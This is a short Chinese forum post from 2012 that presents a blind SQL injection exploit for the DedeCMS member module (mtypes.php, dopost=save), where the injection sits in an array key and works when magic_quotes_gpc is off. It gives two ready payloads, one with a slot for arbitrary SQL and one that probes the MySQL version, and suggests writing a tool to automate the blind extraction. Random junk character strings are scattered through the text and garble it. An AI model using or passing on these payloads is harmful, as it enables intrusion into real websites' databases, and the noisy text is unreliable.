需要magic_quotes_gpc = Off,所以说是鸡肋啊.) G$ q# s: M/ m; d) o+ H5 D
, r6 A4 N6 y; r% t7 A" V- j# j
. _% o0 Y& T7 ]5 ?+ N* p发生在数组key里的注射漏洞,有点意思.
2 }2 V8 H/ |# s+ x: x
; ]: d: o6 G+ | t! J. [, [/ f4 x+ @4 T. R这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下4 l! o. h4 l+ ]* Q5 K
- A; ~3 v; a7 p$ Vhttp://www.xxx.com /dede/member/mtypes.php?dopost=save( U; W) w5 m- v4 W# M3 B+ X
9 B9 d1 H* \5 _exploit:$ P' A- N" c8 m1 y
mtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r
* ~* D) g1 A8 f& G3 R. e' `mtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r
% p' M$ a. g. \* Q |
发表于 2012-12-20 08:08:09
收藏
支持
反对